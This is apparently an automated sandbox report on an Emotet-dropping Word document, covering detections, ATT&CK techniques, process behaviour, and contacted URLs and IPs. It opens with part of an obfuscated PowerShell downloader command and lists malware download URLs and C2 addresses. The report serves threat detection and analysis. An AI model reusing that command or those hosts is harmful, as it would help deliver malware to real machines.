cAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0000000B.00000002.2116581505.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2113422714.00000000003F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2113576039.0000000000780000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2108915228.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2120708575.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2120498924.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2109055699.0000000000710000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2124089879.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2350246723.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2111700747.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2108942082.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2126847598.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2125021450.0000000000210000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2113404333.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2350021887.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2124035115.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2124200175.0000000000760000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2126913357.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2107162967.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2116039169.0000000000170000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2125095238.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2120569228.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2111875145.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2127036397.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2112057590.0000000000340000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2124826552.0000000000170000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2349984443.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2116715619.0000000000430000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2106916506.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2106771774.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 8.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.340000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.7d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.780000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.710000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.3f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.760000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.780000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.760000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.7d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.3f0000.0.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Masquerading21OS Credential DumpingSecurity Software Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScripting12Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonScripting12Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 344339 Sample: Arch_2021_717-1562532.doc Startdate: 26/01/2021 Architecture: WINDOWS Score: 100 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for dropped file 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 12 other signatures 2->55 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 26 2->17         started        process3 signatures4 63 Suspicious powershell command line found 14->63 65 Very long command line found 14->65 67 Encrypted powershell cmdline option found 14->67 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 47 shannared.com 192.169.223.13, 49167, 80 AS-26496-GO-DADDY-COM-LLCUS United States 19->47 45 C:\Users\user\Kaktksw\An6othh4549I.dll, PE32 19->45 dropped 59 Powershell drops PE file 19->59 26 rundll32.exe 19->26         started        file7 signatures8 process9 process10 28 rundll32.exe 26->28         started        process11 30 rundll32.exe 2 28->30         started        signatures12 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->69 33 rundll32.exe 30->33         started        process13 process14 35 rundll32.exe 1 33->35         started        signatures15 57 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->57 38 rundll32.exe 35->38         started        process16 process17 40 rundll32.exe 1 38->40         started        signatures18 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->61 43 rundll32.exe 40->43         started        process19

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Arch_2021_717-1562532.doc16%VirustotalBrowse
                      Arch_2021_717-1562532.doc27%ReversingLabsDocument-Word.Trojan.GenScript

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Kaktksw\An6othh\N49I.dll100%Joe Sandbox ML
                      C:\Users\user\Kaktksw\An6othh\N49I.dll55%ReversingLabsWin32.Trojan.EmotetCrypt

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      12.2.rundll32.exe.2c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.220000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.400000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.170000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.3f0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.780000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.760000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.7d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.340000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.710000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.170000.0.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      shannared.com5%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/0%Avira URL Cloudsafe
                      http://3musketeersent.net/wp-includes/TUgD/100%Avira URL Cloudmalware
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      https://skilmu.com/wp-admin/hQVlB8b/0%Avira URL Cloudsafe
                      http://jeevanlic.com/wp-content/r8M/0%Avira URL Cloudsafe
                      http://dashudance.com/thinkphp/dgs7Jm9/100%Avira URL Cloudmalware
                      http://shannared.com0%Avira URL Cloudsafe
                      http://shannared.com/content/lhALeS/100%Avira URL Cloudmalware
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/100%Avira URL Cloudmalware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://leopardcranes.com/zynq-linux-yaayf/w/100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      shannared.com
                      		192.169.223.13
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://shannared.com/content/lhALeS/true
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmpfalse
                        		high
                        http://www.windows.com/pctv.rundll32.exe, 00000009.00000002.2112546062.0000000001F40000.00000002.00000001.sdmpfalse
                          		high
                          http://investor.msn.comrundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmpfalse
                              		high
                              http://3musketeersent.net/wp-includes/TUgD/powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2105195514.0000000002210000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112633522.0000000002980000.00000002.00000001.sdmpfalse
                                		high
                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmpfalse
                                  		high
                                  https://skilmu.com/wp-admin/hQVlB8b/powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://jeevanlic.com/wp-content/r8M/powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://dashudance.com/thinkphp/dgs7Jm9/powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://shannared.compowershell.exe, 00000005.00000002.2109838810.0000000003A46000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://investor.msn.com/rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmpfalse
                                      		high
                                      http://www.%s.comPApowershell.exe, 00000005.00000002.2105195514.0000000002210000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112633522.0000000002980000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		low
                                      http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmpfalse
                                        		high
                                        http://leopardcranes.com/zynq-linux-yaayf/w/powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        217.160.169.110
                                        		unknownGermany
                                        		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                        51.255.203.164
                                        		unknownFrance
                                        		16276OVHFRtrue
                                        84.232.229.24
                                        		unknownRomania
                                        		8708RCS-RDS73-75DrStaicoviciROtrue
                                        192.169.223.13
                                        		unknownUnited States
                                        		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                        General Information

                                        Joe Sandbox Version:31.0.0 Emerald
                                        Analysis ID:344339
                                        Start date:26.01.2021
                                        Start time:13:32:16
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 13m 8s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:Arch_2021_717-1562532.doc
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:18
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • GSI enabled (VBA)
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winDOC@28/8@1/4
                                        EGA Information:
                                        • Successful, ratio: 88.9%
                                        HDC Information:
                                        • Successful, ratio: 7.9% (good quality ratio 5.9%)
                                        • Quality average: 60.1%
                                        • Quality standard deviation: 37.7%
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .doc
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Found warning dialog
                                        • Click Ok
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                        • TCP Packets have been reduced to 100
                                        • Execution Graph export aborted for target powershell.exe, PID 2564 because it is empty
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        13:32:42API Interceptor1x Sleep call for process: msg.exe modified
                                        13:32:43API Interceptor48x Sleep call for process: powershell.exe modified
                                        13:32:50API Interceptor488x Sleep call for process: rundll32.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        217.160.169.110Exce.dllGet hashmaliciousBrowse
                                          84.232.229.24Notice 8283393_829.docGet hashmaliciousBrowse
                                          • 84.232.229.24/ozrf6dcy5j/7k5jvcfnl1c/ccmrg6oyv4nizx6/
                                          MENSAJE.docGet hashmaliciousBrowse
                                          • 84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/
                                          MENSAJE.docGet hashmaliciousBrowse
                                          • 84.232.229.24/40hbu1ld1mxg/gbxh6m/w00gy5ya8o03k/
                                          MES-2021_01_22-3943960.docGet hashmaliciousBrowse
                                          • 84.232.229.24/yy5pra4h/
                                          Documento 2201 01279.docGet hashmaliciousBrowse
                                          • 84.232.229.24/6zji6l/
                                          DATI 2021.docGet hashmaliciousBrowse
                                          • 84.232.229.24/hu5n7nnlfn8qzz44/4teiln75sss0k/j8fl359hk405/rlm4iik5i1da/3l3lpmieamhaykhkk/
                                          informazioni 536-32772764.docGet hashmaliciousBrowse
                                          • 84.232.229.24/o6p3ixr1vo/0nwr6v/oxpej1lly6ntbn4xn2/x9kd6qn1qdqyq/d0lxoj4a8vrn/
                                          Meddelelse-58931636.docGet hashmaliciousBrowse
                                          • 84.232.229.24/m4mfruuzgu2ajo8qu7t/bl7ktqi5zlffcg/x8ofu4so7/loe8ts1l0p5/nzne9gz6/76ki44u754xsh/
                                          doc_2201_3608432.docGet hashmaliciousBrowse
                                          • 84.232.229.24/jcmzbwn9r7yck/wlh8myw/
                                          13-2021.docGet hashmaliciousBrowse
                                          • 84.232.229.24/g4fo4/gsc17oaf9ynv0wo/670mqqf8vrds/5wmsg3x72r/mh2sm8tbg/2jp5a8m51xtysk3vljn/
                                          MAIL-224201 277769577.docGet hashmaliciousBrowse
                                          • 84.232.229.24/nef4co7lnfc9omq/gcs3bqsea9h/by1c/ujdlxj02m6twsi0q/5qqr6ck1fl34uz4g8l/tck4x5pqu8pykii6lbl/
                                          192.169.223.13Notice 8283393_829.docGet hashmaliciousBrowse
                                          • shannared.com/content/lhALeS/
                                          MPbBCArHPF.exeGet hashmaliciousBrowse
                                          • www.zante2020.com/de92/?ofutZl=LJRLKBSy6grrtpsJhG02GrYQIWz0ACN12l1WS7OpcnRH7cIC7TbO0nH4HvapdKvK3MkbU2/Law==&00GP-0=Lho4HDB0q2fdJ
                                          5DY3NrVgpI.exeGet hashmaliciousBrowse
                                          • www.zante2020.com/de92/?FdC4E2D=LJRLKBSy6grrtpsJhG02GrYQIWz0ACN12l1WS7OpcnRH7cIC7TbO0nH4HvapdKvK3MkbU2/Law==&AjR=9r4L1
                                          DEBIT NOTE_ PZU000147200.exeGet hashmaliciousBrowse
                                          • www.signpartnerpro.com/6bu2/?ElS=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAzecGlgx6T+D&Qtr=KnSlEX8p2LY
                                          SWIFT USD 354,883.00.exeGet hashmaliciousBrowse
                                          • www.signpartnerpro.com/6bu2/?DjU4Hl=gbG8jNk0zBv&YL0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAze2ZVQx+R2D
                                          SAWR000148651.exeGet hashmaliciousBrowse
                                          • www.signpartnerpro.com/6bu2/?u6u0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAze2ZVQx+R2D&9r4l2=xPJtQXiX
                                          DEBIT NOTE-1C017A.exeGet hashmaliciousBrowse
                                          • www.signpartnerpro.com/6bu2/?Cjs0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAzecGlgx6T+D&al4=aV50jnQxv4qp0f
                                          Unode.exeGet hashmaliciousBrowse
                                          • www.electwatman.com/gtb/?t6A8=BSvxnM/FatY3MVaHvUsc2bSEp39whkHRVvBzdyZiJhALHrd8voDBQHL8OFVR1zdRJwYw&9r4l2=xPGHVlS8
                                          http://ambiancemedicalspa.com/application/orcle.phpGet hashmaliciousBrowse
